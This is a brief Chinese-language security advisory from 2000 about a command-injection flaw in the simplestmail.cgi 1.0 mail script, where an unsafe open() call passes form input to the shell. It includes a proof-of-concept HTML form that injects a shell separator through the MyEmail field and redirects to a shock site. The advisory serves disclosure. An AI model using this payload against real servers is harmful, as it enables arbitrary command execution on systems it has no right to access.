Leif M. Wright simplestmail.cgi 存在可执行任意命令的漏洞发布时间:2000-12-14 更新时间:2000-12-14 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Leif M. Wright simplestmail.cgi 1.0详细描述 Leif M. Wright simplestmail.cgi 1.0 是一个通过WEB表单整理EMAIL的脚本, 其中调用了不安全的函数open()可以导致从用户输入出执行SHELL命令,导致以 WEB的身份执行任意命令。 测试代码 <html> <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST> Command: <input type=text name=MyEmail value=";"> <input type=hidden name=redirect value="http://goatse.cx"> <input type=submit name=submit value="run"> </form> </html> 解决方案 尚无 相关信息 |